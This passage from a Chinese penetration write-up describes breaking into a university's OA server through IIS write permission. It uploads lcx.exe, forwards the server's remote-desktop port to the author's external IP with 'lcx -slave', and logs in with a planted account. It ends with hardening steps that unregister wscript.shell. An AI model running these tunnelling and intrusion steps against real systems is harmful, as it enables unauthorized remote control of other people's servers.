利用IIS写权限成功渗透西南某高校OA系统
2008-12-15 13:38:49 来源:WEB开发网核心提示: 分别上传cmd.exe和lcx.exe到网站目录“e:oaseoa”下,然后在“CMD命令”窗口中执行“e:oaseoalcx –slave 125.67.147.*51 127.0.0.1 8080 ”,
分别上传cmd.exe和lcx.exe到网站目录“e:oaseoa”下,然后在“CMD命令”窗口中执行“e:oaseoalcx –slave 125.67.147.* 51 127.0.0.1 8080 ”,如图6所示。
图6执行端口转发命令
此时此服务器的终端端口已经转发到我本机“125.67.147.*”的51端口上,我在本机执行“Lcx.exe -listen 51 2222”将服务器终端再一次重定向到我本机的2222端口,然后连上本机2222端口,也就登陆了服务器的终端端口,成功转发。然后再打开mstsc远程桌面连接,输入刚才添加到用户和密码成功进入系统,如图7所示,至此利用IIS写权限已经成功渗透该OA系统。
图7成功进入该OA系统所在的服务器
四、安全防范与加固
1.卸载一些危险的组件
基本的防御方法,卸载一些不必要的组件,比如wscript.shell之类,在运行中分别执行以下命令卸载wscript.shell等危险组件:
(1)regsvr32 /u c:windowssystem32WSHom.Ocx /s
(2)regsvr32 /u C:WIndowssystem32shell32.dll /s
执行完毕后,再在asp木马上运行系统命令的时候,出现“ActiveX不见不能创建对象”,如图8所示。
更多精彩
赞助商链接